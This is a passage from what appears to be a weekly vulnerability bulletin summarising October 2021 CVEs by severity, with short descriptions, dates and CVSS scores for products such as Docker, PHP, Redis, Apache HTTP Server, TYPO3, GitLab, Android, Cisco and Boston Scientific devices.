mobyproject -- moby | Moby is an open-source project created by Docker to enable software containerization. A bug was found in Moby (Docker Engine) where attempting to copy files using `docker cp` into a specially-crafted container can result in Unix file permission changes for existing files in the host’s filesystem, widening access to others. This bug does not directly allow files to be read, modified, or executed without an additional cooperating process. This bug has been fixed in Moby (Docker Engine) 20.10.9. Users should update to this version as soon as possible. Running containers do not need to be restarted. | 2021-10-04 | 4.4 | CVE-2021-41089
MISC
CONFIRM
mysurvey -- survey_solutions | Survey Solutions is a survey management and data collection system. In affected versions the Headquarters application publishes /metrics endpoint available to any user. None of the survey answers are ever exposed, only the aggregate counters, including count of interviews, or count of assignments. Starting from version 21.09.1 the endpoint is turned off by default. | 2021-10-04 | 5 | CVE-2021-41123
MISC
CONFIRM
omikron -- multicash | Omikron MultiCash Desktop 4.00.008.SP5 relies on a client-side authentication mechanism. When a user logs into the application, the validity of the password is checked locally. All communication to the database backend is made via the same technical account. Consequently, an attacker can attach a debugger to the process or create a patch that manipulates the behavior of the login function. When the function always returns the success value (corresponding to a correct password), an attacker can login with any desired account, such as the administrative account of the application. | 2021-10-05 | 4.6 | CVE-2021-41286
MISC
online-shopping-system-advanced_project -- online-shopping-system-advanced | An unauthenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /action.php prId parameter. The POST request handler does not sanitize the user input. | 2021-10-01 | 5 | CVE-2021-41648
MISC
MISC
online_food_ordering_web_app_project -- online_food_ordering_web_app | An unauthenticated error-based and time-based blind SQL injection vulnerability exists in Kaushik Jadhav Online Food Ordering Web App 1.0. An attacker can exploit the vulnerable "username" parameter in login.php and retrieve sensitive database information, as well as add an administrative user. | 2021-10-01 | 6.4 | CVE-2021-41647
MISC
MISC
MISC
MISC
pardus -- liderahenk | Versions 2.1.15 and below of the Lider module in LiderAhenk software leak their configuration via an unsecured API. An attacker with access to the configuration API could obtain valid LDAP credentials. | 2021-10-01 | 5 | CVE-2021-3825
CONFIRM
CONFIRM
php -- php | In PHP versions 7.3.x below 7.3.31, 7.4.x below 7.4.24 and 8.0.x below 8.0.11, in Microsoft Windows environment, ZipArchive::extractTo may be tricked into writing a file outside target directory when extracting a ZIP file, thus potentially causing files to be created or overwritten, subject to OS permissions. | 2021-10-04 | 4.3 | CVE-2021-21706
CONFIRM
php -- php | In PHP versions 7.3.x below 7.3.29, 7.4.x below 7.4.21 and 8.0.x below 8.0.8, when using URL validation functionality via filter_var() function with FILTER_VALIDATE_URL parameter, a URL with an invalid password field can be accepted as valid. This can lead to the code incorrectly parsing the URL and potentially leading to other security implications, like contacting a wrong server or making a wrong access decision. | 2021-10-04 | 5 | CVE-2021-21705
CONFIRM
php -- php | In PHP versions 7.3.x below 7.3.29, 7.4.x below 7.4.21 and 8.0.x below 8.0.8, when using Firebird PDO driver extension, a malicious database server could cause crashes in various database functions, such as getAttribute(), execute(), fetch() and others by returning invalid response data that is not parsed correctly by the driver. This can result in crashes, denial of service or potentially memory corruption. | 2021-10-04 | 4.3 | CVE-2021-21704
CONFIRM
CONFIRM
CONFIRM
CONFIRM
pixeline -- bugs | Cross-site scripting (XSS) vulnerability in install/index.php in bugs 1.8 and below allows remote attackers to inject arbitrary web script or HTML via the email parameter. | 2021-10-01 | 4.3 | CVE-2021-40923
MISC
MISC
pixeline -- bugs | Cross-site scripting (XSS) vulnerability in install/index.php in bugs 1.8 and below allows remote attackers to inject arbitrary web script or HTML via the first_name parameter. | 2021-10-01 | 4.3 | CVE-2021-40924
MISC
MISC
pixeline -- bugs | Cross-site scripting (XSS) vulnerability in install/index.php in bugs 1.8 and below allows remote attackers to inject arbitrary web script or HTML via the last_name parameter. | 2021-10-01 | 4.3 | CVE-2021-40922
MISC
MISC
redis -- hiredis | Hiredis is a minimalistic C client library for the Redis database. In affected versions Hiredis is vulnerable to integer overflow if provided maliciously crafted or corrupted `RESP` `multi-bulk` protocol data. When parsing `multi-bulk` (array-like) replies, hiredis fails to check if `count * sizeof(redisReply*)` can be represented in `SIZE_MAX`. If it can not, and the `calloc()` call doesn't itself make this check, it would result in a short allocation and subsequent buffer overflow. Users of hiredis who are unable to update may set the [maxelements](https://github.com/redis/hiredis#reader-max-array-elements) context option to a value small enough that no overflow is possible. | 2021-10-04 | 6.5 | CVE-2021-32765
MISC
CONFIRM
MISC
redislabs -- redis | Redis is an open source, in-memory database that persists on disk. When using the Redis Lua Debugger, users can send malformed requests that cause the debugger’s protocol parser to read data beyond the actual buffer. This issue affects all versions of Redis with Lua debugging support (3.2 or newer). The problem is fixed in versions 6.2.6, 6.0.16 and 5.0.14. | 2021-10-04 | 4 | CVE-2021-32672
CONFIRM
MISC
scalabium -- dbase_viewer | Scalabium dBase Viewer version 2.6 (Build 5.751) is vulnerable to remote code execution via a crafted DBF file that triggers a buffer overflow. An attacker can use the Structured Exception Handler (SEH) records and redirect execution to attacker-controlled code. | 2021-10-01 | 6.8 | CVE-2021-35297
MISC
spotweb_project -- spotweb | Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allows remote attackers to inject arbitrary web script or HTML via the lastname parameter. | 2021-10-01 | 4.3 | CVE-2021-40973
MISC
MISC
spotweb_project -- spotweb | Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allows remote attackers to inject arbitrary web script or HTML via the newpassword1 parameter. | 2021-10-01 | 4.3 | CVE-2021-40971
MISC
MISC
spotweb_project -- spotweb | Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allows remote attackers to inject arbitrary web script or HTML via the username parameter. | 2021-10-01 | 4.3 | CVE-2021-40970
MISC
MISC
spotweb_project -- spotweb | Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allows remote attackers to inject arbitrary web script or HTML via the newpassword2 parameter. | 2021-10-01 | 4.3 | CVE-2021-40968
MISC
MISC
spotweb_project -- spotweb | Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allows remote attackers to inject arbitrary web script or HTML via the mail parameter. | 2021-10-01 | 4.3 | CVE-2021-40972
MISC
MISC
thycotic -- secret_server | A SQL injection issue was discovered in ThycoticCentrify Secret Server before 11.0.000007. The only affected versions are 10.9.000032 through 11.0.000006. | 2021-10-01 | 4 | CVE-2021-41845
MISC
MISC
tibco -- activespaces | The FTL Server (tibftlserver) and Docker images containing tibftlserver components of TIBCO Software Inc.'s TIBCO ActiveSpaces - Community Edition, TIBCO ActiveSpaces - Developer Edition, TIBCO ActiveSpaces - Enterprise Edition, TIBCO FTL - Community Edition, TIBCO FTL - Developer Edition, TIBCO FTL - Enterprise Edition, TIBCO eFTL - Community Edition, TIBCO eFTL - Developer Edition, and TIBCO eFTL - Enterprise Edition contain a vulnerability that theoretically allows a non-administrative, authenticated FTL user to trick the affected components into creating illegitimate certificates. These maliciously generated certificates can be used to enable man-in-the-middle attacks or to escalate privileges so that the malicious user has administrative privileges. Affected releases are TIBCO Software Inc.'s TIBCO ActiveSpaces - Community Edition: versions 4.3.0, 4.4.0, 4.5.0, 4.6.0, 4.6.1, and 4.6.2, TIBCO ActiveSpaces - Developer Edition: versions 4.3.0, 4.4.0, 4.5.0, 4.6.0, 4.6.1, and 4.6.2, TIBCO ActiveSpaces - Enterprise Edition: versions 4.3.0, 4.4.0, 4.5.0, 4.6.0, 4.6.1, and 4.6.2, TIBCO FTL - Community Edition: versions 6.2.0, 6.3.0, 6.3.1, 6.4.0, 6.5.0, 6.6.0, 6.6.1, and 6.7.0, TIBCO FTL - Developer Edition: versions 6.2.0, 6.3.0, 6.3.1, 6.4.0, 6.5.0, 6.6.0, 6.6.1, and 6.7.0, TIBCO FTL - Enterprise Edition: versions 6.2.0, 6.3.0, 6.3.1, 6.4.0, 6.5.0, 6.6.0, 6.6.1, and 6.7.0, TIBCO eFTL - Community Edition: versions 6.2.0, 6.3.0, 6.3.1, 6.4.0, 6.5.0, 6.6.0, 6.6.1, and 6.7.0, TIBCO eFTL - Developer Edition: versions 6.2.0, 6.3.0, 6.3.1, 6.4.0, 6.5.0, 6.6.0, 6.6.1, and 6.7.0, and TIBCO eFTL - Enterprise Edition: versions 6.2.0, 6.3.0, 6.3.1, 6.4.0, 6.5.0, 6.6.0, 6.6.1, and 6.7.0. | 2021-10-05 | 6 | CVE-2021-35497
CONFIRM
CONFIRM
typo3 -- typo3 | TYPO3 is an open source PHP based web content management system released under the GNU GPL. It has been discovered that the new TYPO3 v11 feature that allows users to create and share deep links in the backend user interface is vulnerable to cross-site-request-forgery. The impact is the same as described in TYPO3-CORE-SA-2020-006 (CVE-2020-11069). However, it is not limited to the same site context and does not require the attacker to be authenticated. In a worst case scenario, the attacker could create a new admin user account to compromise the system. To successfully carry out an attack, an attacker must trick the victim into accessing a compromised system. The victim must have an active session in the TYPO3 backend at that time. The following Same-Site cookie settings in $GLOBALS[TYPO3_CONF_VARS][BE][cookieSameSite] are required for an attack to be successful: SameSite=strict: malicious evil.example.org invoking TYPO3 application at good.example.org and SameSite=lax or none: malicious evil.com invoking TYPO3 application at example.org. Update your instance to TYPO3 version 11.5.0 which addresses the problem described. | 2021-10-05 | 6.8 | CVE-2021-41113
MISC
CONFIRM
MISC
typo3 -- typo3 | TYPO3 is an open source PHP based web content management system released under the GNU GPL. It has been discovered that TYPO3 CMS is susceptible to host spoofing due to improper validation of the HTTP Host header. TYPO3 uses the HTTP Host header, for example, to generate absolute URLs during the frontend rendering process. Since the host header itself is provided by the client, it can be forged to any value, even in a name-based virtual hosts environment. This vulnerability is the same as described in TYPO3-CORE-SA-2014-001 (CVE-2014-3941). A regression, introduced during TYPO3 v11 development, led to this situation. The already existing setting $GLOBALS['TYPO3_CONF_VARS']['SYS']['trustedHostsPattern'] (used as an effective mitigation strategy in previous TYPO3 versions) was not evaluated anymore, and reintroduced the vulnerability. | 2021-10-05 | 5 | CVE-2021-41114
CONFIRM
MISC
MISC
wowza -- streaming_engine | A Cross-Site Request Forgery (CSRF) vulnerability in Wowza Streaming Engine through 4.8.11+5 allows a remote attacker to delete a user account via the /enginemanager/server/user/delete.htm userName parameter. The application does not implement a CSRF token for the GET request. | 2021-10-05 | 5.8 | CVE-2021-35491
MISC
MISC
MISC
wowza -- streaming_engine | Wowza Streaming Engine through 4.8.11+5 could allow an authenticated, remote attacker to exhaust filesystem resources via the /enginemanager/server/vhost/historical.jsdata vhost parameter. This is due to the insufficient management of available filesystem resources. An attacker could exploit this vulnerability through the Virtual Host Monitoring section by requesting random virtual-host historical data and exhausting available filesystem resources. A successful exploit could allow the attacker to cause database errors and cause the device to become unresponsive to web-based management. (Manual intervention is required to free filesystem resources and return the application to an operational state.) | 2021-10-05 | 4 | CVE-2021-35492
MISC
MISC
MISC
Low Vulnerabilities

Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info
calibre-web_project -- calibre-web | The “Calibre-web” application, v0.6.0 to v0.6.12, is vulnerable to Stored XSS in “Metadata”. An attacker that has access to edit the metadata information can inject a JavaScript payload in the description field. When a victim tries to open the file, the XSS will be triggered. | 2021-10-04 | 3.5 | CVE-2021-25964
MISC
MISC
canonical -- apport | Function check_attachment_for_errors() in file data/general-hooks/ubuntu.py could be tricked into exposing private data via a constructed crash file. This issue affects: apport 2.14.1 versions prior to 2.14.1-0ubuntu3.29+esm8; 2.20.1 versions prior to 2.20.1-0ubuntu2.30+esm2; 2.20.9 versions prior to 2.20.9-0ubuntu7.26; 2.20.11 versions prior to 2.20.11-0ubuntu27.20; 2.20.11 versions prior to 2.20.11-0ubuntu65.3. | 2021-10-01 | 2.1 | CVE-2021-3709
MISC
MISC
MISC
MISC
cminds -- enhanced-tooltipglossary | The CM Tooltip Glossary WordPress plugin before 3.9.21 does not escape some glossary_tooltip shortcode attributes, which could allow users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks. | 2021-10-04 | 3.5 | CVE-2021-24678
MISC
dwbooster -- appointment_hour_booking | The Appointment Hour Booking WordPress plugin before 1.3.16 does not escape some of the Calendar Form settings, allowing high privilege users to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. | 2021-10-04 | 3.5 | CVE-2021-24673
MISC
esri -- portal_for_arcgis | Stored cross-site scripting (XSS) issue in Esri Portal for ArcGIS may allow a remote unauthenticated attacker to pass and store malicious strings in the home application. | 2021-10-01 | 3.5 | CVE-2021-29110
CONFIRM
gitlab -- gitlab | A stored Cross-Site Scripting vulnerability in the GitLab Flavored Markdown in GitLab CE/EE version 8.4 and above allowed an attacker to execute arbitrary JavaScript code on the victim's behalf. | 2021-10-05 | 3.5 | CVE-2021-39887
MISC
CONFIRM
MISC
gitlab -- gitlab | In all versions of GitLab CE/EE since version 7.7, the application may let a malicious user create an OAuth client application with arbitrary scope names which may allow the malicious user to trick unsuspecting users to authorize the malicious client application using the spoofed scope name and description. | 2021-10-05 | 3.5 | CVE-2021-39881
MISC
CONFIRM
MISC
gitlab -- gitlab | A stored Cross-Site Scripting vulnerability in the Jira integration in GitLab version 13.7 and above allows an attacker to execute arbitrary JavaScript code on the victim's behalf via malicious Jira API responses. | 2021-10-05 | 3.5 | CVE-2021-22261
MISC
CONFIRM
MISC
google -- android | In ellipsize of Layout.java, there is a possible ANR due to improper input validation. This could lead to local denial of service with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-9, Android-10, Android-11, Android-8.1. Android ID: A-188913943 | 2021-10-06 | 1.9 | CVE-2021-0687
MISC
google -- android | In sendAccessibilityEvent of NotificationManagerService.java, there is a possible disclosure of notification data due to a missing permission check. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11, Android-8.1, Android-9, Android-10. Android ID: A-159624555 | 2021-10-06 | 2.1 | CVE-2021-0682
MISC
google -- android | In conditionallyRemoveIdentifiers of SubscriptionController.java, there is a possible way to retrieve a trackable identifier due to a missing permission check. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11, Android-10. Android ID: A-181053462 | 2021-10-06 | 2.1 | CVE-2021-0644
MISC
google -- android | In openFile of HeapDumpProvider.java, there is a possible way to retrieve generated heap dumps from debuggable apps due to an unprotected provider. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-184046948 | 2021-10-06 | 2.1 | CVE-2021-0693
MISC
google -- android | In getDefaultSmsPackage of RoleManagerService.java, there is a possible way to get information about the default sms app of a different device user due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11, Android-10. Android ID: A-177927831 | 2021-10-06 | 2.1 | CVE-2021-0686
MISC
google -- android | In RGB_to_BGR1_portable of SkSwizzler_opts.h, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-8.1, Android-9. Android ID: A-190188264 | 2021-10-06 | 2.1 | CVE-2021-0689
MISC
google -- android | In system properties, there is a possible information disclosure due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android SoC. Android ID: A-192535337 | 2021-10-06 | 2.1 | CVE-2021-0681
MISC
google -- android | In get_sock_stat of xt_qtaguid.c, there is a possible out of bounds read due to a use after free. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-184018316. References: Upstream kernel | 2021-10-06 | 2.1 | CVE-2021-0695
MISC
google -- android | In system properties, there is a possible information disclosure due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android SoC. Android ID: A-192535676 | 2021-10-06 | 2.1 | CVE-2021-0680
MISC
ibm -- sterling_b2b_integrator | IBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 6.1.1.0 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 202268. | 2021-10-06 | 3.5 | CVE-2021-29764
XF
CONFIRM
icehrm -- icehrm | A Stored Cross Site Scripting vulnerability via Malicious File Upload exists in multiple pages of IceHrm 30.0.0.OS that allows for arbitrary execution of JavaScript commands. | 2021-10-04 | 3.5 | CVE-2021-38822
MISC
maccms -- maccms | Maccms 10 contains a cross-site scripting (XSS) vulnerability in the Editing function under the Member module. This vulnerability is exploited via a crafted payload in the nickname text field. | 2021-10-04 | 3.5 | CVE-2020-21434
MISC
qnap -- image2pdf | A cross-site scripting (XSS) vulnerability has been reported to affect QNAP devices running Image2PDF. If exploited, this vulnerability allows remote attackers to inject malicious code. We have already fixed this vulnerability in the following versions of Image2PDF: Image2PDF 2.1.5 (2021/08/17) and later. | 2021-10-01 | 3.5 | CVE-2021-38675
MISC
qnap -- photo_station | A cross-site scripting (XSS) vulnerability has been reported to affect QNAP devices running Photo Station. If exploited, this vulnerability allows remote attackers to inject malicious code. We have already fixed this vulnerability in the following versions of Photo Station: Photo Station 6.0.18 (2021/09/01) and later. | 2021-10-01 | 3.5 | CVE-2021-34356
MISC
qnap -- photo_station | A cross-site scripting (XSS) vulnerability has been reported to affect QNAP NAS running Photo Station. If exploited, this vulnerability allows remote attackers to inject malicious code. We have already fixed this vulnerability in the following versions of Photo Station: Photo Station 5.4.10 (2021/08/19) and later; Photo Station 5.7.13 (2021/08/19) and later; Photo Station 6.0.18 (2021/09/01) and later. | 2021-10-01 | 3.5 | CVE-2021-34355
MISC
qnap -- photo_station | A cross-site scripting (XSS) vulnerability has been reported to affect QNAP devices running Photo Station. If exploited, this vulnerability allows remote attackers to inject malicious code. We have already fixed this vulnerability in the following versions of Photo Station: Photo Station 6.0.18 (2021/09/01) and later. | 2021-10-01 | 3.5 | CVE-2021-34354
MISC
telegram -- telegram | The Telegram application 7.5.0 through 7.8.0 for Android does not properly implement image self-destruction, a different vulnerability than CVE-2019-16248. After approximately two to four uses of the self-destruct feature, there is a misleading UI indication that an image was deleted (on both the sender and recipient sides). The images are still present in the /Storage/Emulated/0/Telegram/Telegram Image/ directory. | 2021-10-04 | 2.1 | CVE-2021-41861
MISC
MISC
MISC
MISC
webnus -- modern_events_calendar_lite | The Modern Events Calendar Lite WordPress plugin before 5.22.2 does not escape some of its settings before outputting them in attributes, allowing high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. | 2021-10-04 | 3.5 | CVE-2021-24687
MISC
wpeverest -- user_registration | The User Registration WordPress plugin before 2.0.2 does not properly sanitise the user_registration_profile_pic_url value when submitted directly via the user_registration_update_profile_details AJAX action. This could allow any authenticated user, such as a subscriber, to perform Stored Cross-Site Scripting attacks when their profile is viewed. | 2021-10-04 | 3.5 | CVE-2021-24654
MISC
Severity Not Yet Assigned

Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info
N/A -- N/A | IBM PowerVM Hypervisor FW1010 could allow a privileged user to gain access to another VM due to assigning duplicate WWPNs. IBM X-Force ID: 210162. | 2021-10-06 | not yet calculated | CVE-2021-38923
XF
CONFIRM
N/A -- N/A | ACINQ Eclair before 0.6.3 allows loss of funds because of dust HTLC exposure. | 2021-10-04 | not yet calculated | CVE-2021-41591
MISC
MISC
MISC
MISC
accel-ppp -- accel-ppp | ACCEL-PPP 1.12.0 has an out-of-bounds read in triton_context_schedule if the client exits after authentication. | 2021-10-07 | not yet calculated | CVE-2021-42054
MISC
adobe -- acrobat_reader_dc | Acrobat Reader DC versions 2021.005.20060 (and earlier), 2020.004.30006 (and earlier) and 2017.011.30199 (and earlier) are affected by a use-after-free vulnerability when processing AcroForm listbox that could result in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. | 2021-10-07 | not yet calculated | CVE-2021-40725
MISC
adobe -- acrobat_reader_dc | Acrobat Reader DC versions 2021.005.20060 (and earlier), 2020.004.30006 (and earlier) and 2017.011.30199 (and earlier) are affected by a use-after-free vulnerability when processing AcroForm field that could result in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. | 2021-10-07 | not yet calculated | CVE-2021-40726
MISC
adobe -- xmp_toolkit_sdk | XMP Toolkit SDK version 2020.1 (and earlier) is affected by a buffer overflow vulnerability potentially resulting in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a specially-crafted .cpp file. | 2021-10-04 | not yet calculated | CVE-2021-36051
MISC
afian -- filerun_2021.03.26 | Afian FileRun 2021.03.26 allows Remote Code Execution (by administrators) via the Check Path value for the magick binary. | 2021-10-05 | not yet calculated | CVE-2021-35505
MISC
MISC
afian -- filerun_2021.03.26 | Afian FileRun 2021.03.26 allows Remote Code Execution (by administrators) via the Check Path value for the ffmpeg binary. | 2021-10-05 | not yet calculated | CVE-2021-35504
MISC
MISC
akamai -- enterprise_application_access_client | In Akamai EAA (Enterprise Application Access) Client before 2.3.1, 2.4.x before 2.4.1, and 2.5.x before 2.5.3, an unquoted path may allow an attacker to hijack the flow of execution. | 2021-10-04 | not yet calculated | CVE-2021-40683
MISC
CONFIRM
alkacon -- opencms | An XML external entity (XXE) vulnerability in Alkacon OpenCms 11.0, 11.0.1 and 11.0.2 allows remote authenticated users with edit privileges to exfiltrate files from the server's file system by uploading a crafted SVG document. | 2021-10-08 | not yet calculated | CVE-2021-3312
MISC
MISC
apache -- http_server_2.4 | While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project. | 2021-10-05 | not yet calculated | CVE-2021-41524
MISC
MLIST
FEDORA
CISCO
apache -- http_server_2.4.49 | A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013. | 2021-10-05 | not yet calculated | CVE-2021-41773
MISC
MLIST
MLIST
MLIST
MISC
MLIST
MISC
MLIST
MLIST
MLIST
CISCO
MLIST
MLIST
MLIST
MLIST
MLIST
MLIST
MLIST
MLIST
apache -- http_server_2.4.50 | It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions. | 2021-10-07 | not yet calculated | CVE-2021-42013
MISC
MLIST
MLIST
MLIST
CISCO
JVN
MLIST
MLIST
MLIST
MLIST
MLIST
MLIST
MLIST
MLIST
apache -- openoffice | While working on Apache OpenOffice 4.1.8 a developer discovered that the DEB package did not install using root, but instead used a userid and groupid of 500. This both caused issues with desktop integration and could allow a crafted attack on files owned by that user or group if they exist. Users who installed the Apache OpenOffice 4.1.8 DEB packaging should upgrade to the latest version of Apache OpenOffice. | 2021-10-07 | not yet calculated | CVE-2021-28129
MISC
MLIST
MLIST
MLIST
apache -- openoffice | Apache OpenOffice has a dependency on expat software. Versions prior to 2.1.0 were subject to CVE-2013-0340, a "Billion Laughs" entity expansion denial of service attack and exploit via crafted XML files. ODF files consist of a set of XML files. All versions of Apache OpenOffice up to 4.1.10 are subject to this issue. expat in version 4.1.11 is patched. | 2021-10-07 | not yet calculated | CVE-2021-40439
MISC
MLIST
MLIST
MLIST
axis -- axis_devices | A user controlled parameter related to SMTP test functionality is not correctly validated, making it possible to bypass blocked network recipients. | 2021-10-05 | not yet calculated | CVE-2021-31987
MISC
axis -- axis_devices | A user controlled parameter related to SMTP test functionality is not correctly validated, making it possible to add the Carriage Return and Line Feed (CRLF) control characters and include arbitrary SMTP headers in the generated test email. | 2021-10-05 | not yet calculated | CVE-2021-31988
MISC
axis -- axis_devices | User controlled parameters related to SMTP notifications are not correctly validated. This can lead to a buffer overflow resulting in crashes and data leakage. | 2021-10-05 | not yet calculated | CVE-2021-31986
MISC
ballistix_mod_utility -- ballistix_mod_utility
Ballistix MOD Utility through 2.0.2.5 is vulnerable to privilege escalation in the MODAPI.sys driver component. The vulnerability is triggered by sending a specific IOCTL request that allows low-privileged users to directly interact with physical memory via the MmMapIoSpace function call (mapping physical memory into a virtual address space). Attackers could exploit this issue to achieve local privilege escalation to NT AUTHORITY\SYSTEM.
Published: 2021-10-04 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-41285; MISC, MISC

biqs_it_biqs-drive -- biqs_it_biqs-drive
A local file inclusion (LFI) vulnerability exists in BIQS IT Biqs-drive v1.83 and below when sending a specific payload as the file parameter to download/index.php. This allows the attacker to read arbitrary files from the server with the permissions of the configured web-user.
Published: 2021-10-04 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-39433; MISC, MISC

bosch -- rexrooth_indramotion_mlc_and_indralogic_xlc
Login with hash: The login routine allows the client to log in to the system not by using the password, but by using the hash of the password. Combined with CVE-2021-23858, this allows an attacker to subsequently log in to the system.
Published: 2021-10-04 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-23857; CONFIRM

bosch -- rexrooth_indramotion_mlc_and_indralogic_xlc
The user and password database is exposed by an unprotected web server resource. Passwords are hashed with a weak hashing algorithm and therefore allow an attacker to determine the password by using rainbow tables.
Published: 2021-10-04 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-23855; CONFIRM

bosch -- rexrooth_indramotion_mlc_and_indralogic_xlc
Information disclosure: The main configuration, including users and their hashed passwords, is exposed by an unprotected web server resource and can be accessed without authentication. Additionally, device details are exposed which include the serial number and the firmware version by another unprotected web server resource.
Published: 2021-10-04 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-23858; CONFIRM

boston_scientific -- zoom_latitude_programmer/recorder/monitor_model_3120
An attacker with physical access to the device can extract the binary that checks for the hardware key and reverse engineer it, which could be used to create a physical duplicate of a valid hardware key. The hardware key allows access to special settings when inserted.
Published: 2021-10-04 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-38394; MISC

boston_scientific -- zoom_latitude_programmer/recorder/monitor_model_3120
The affected device uses off-the-shelf software components that contain unpatched vulnerabilities. A malicious attacker with physical access to the affected device could exploit these vulnerabilities.
Published: 2021-10-04 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-38398; MISC

boston_scientific -- zoom_latitude_programmer/recorder/monitor_model_3120
An attacker with physical access to Boston Scientific Zoom Latitude Model 3120 can remove the hard disk drive or create a specially crafted USB to extract the password hash for brute force reverse engineering of the system password.
Published: 2021-10-04 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-38400; MISC

boston_scientific -- zoom_latitude_programmer/recorder/monitor_model_3120
The programmer installation utility does not perform cryptographic authenticity or integrity checks of the software on the flash drive. An attacker could leverage this weakness to install unauthorized software using a specially crafted USB.
Published: 2021-10-04 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-38396; MISC

boston_scientific -- zoom_latitude_programmer/recorder/monitor_model_3120
A skilled attacker with physical access to the affected device can gain access to the hard disk drive of the device to change the telemetry region and could use this setting to interrogate or program an implantable device in any region in the world.
Published: 2021-10-04 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-38392; MISC

cisco -- anyconnect_secure_mobility_client
A vulnerability in the shared library loading mechanism of Cisco AnyConnect Secure Mobility Client for Linux and Mac OS could allow an authenticated, local attacker to perform a shared library hijacking attack on an affected device if the VPN Posture (HostScan) Module is installed on the AnyConnect client. This vulnerability is due to a race condition in the signature verification process for shared library files that are loaded on an affected device. An attacker could exploit this vulnerability by sending a series of crafted interprocess communication (IPC) messages to the AnyConnect process. A successful exploit could allow the attacker to execute arbitrary code on the affected device with root privileges. To exploit this vulnerability, the attacker must have a valid account on the system.
Published: 2021-10-06 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-34788; CISCO

cisco -- asyncos
A vulnerability in the proxy service of Cisco AsyncOS for Cisco Web Security Appliance (WSA) could allow an unauthenticated, remote attacker to exhaust system memory and cause a denial of service (DoS) condition on an affected device. This vulnerability is due to improper memory management in the proxy service of an affected device. An attacker could exploit this vulnerability by establishing a large number of HTTPS connections to the affected device. A successful exploit could allow the attacker to cause the system to stop processing new connections, which could result in a DoS condition. Note: Manual intervention may be required to recover from this situation.
Published: 2021-10-06 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-34698; CISCO

cisco -- asyncos_software
A vulnerability in the antispam protection mechanisms of Cisco AsyncOS Software for Cisco Email Security Appliance (ESA) could allow an unauthenticated, remote attacker to bypass the URL reputation filters on an affected device. This vulnerability is due to improper processing of URLs. An attacker could exploit this vulnerability by crafting a URL in a particular way. A successful exploit could allow the attacker to bypass the URL reputation filters that are configured for an affected device, which could allow malicious URLs to pass through the device.
Published: 2021-10-06 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-1534; CISCO

cisco -- ata_190_series_analog_telephone_adapter_software
Multiple vulnerabilities in the Cisco ATA 190 Series Analog Telephone Adapter Software could allow an attacker to perform a command injection attack resulting in remote code execution or cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.
Published: 2021-10-06 | CVSS Score: not yet calculated
Source & Patch Info: CVE-2021-34710; CISCO

cisco -- ata_190_series_analog_telephone_adapter_software
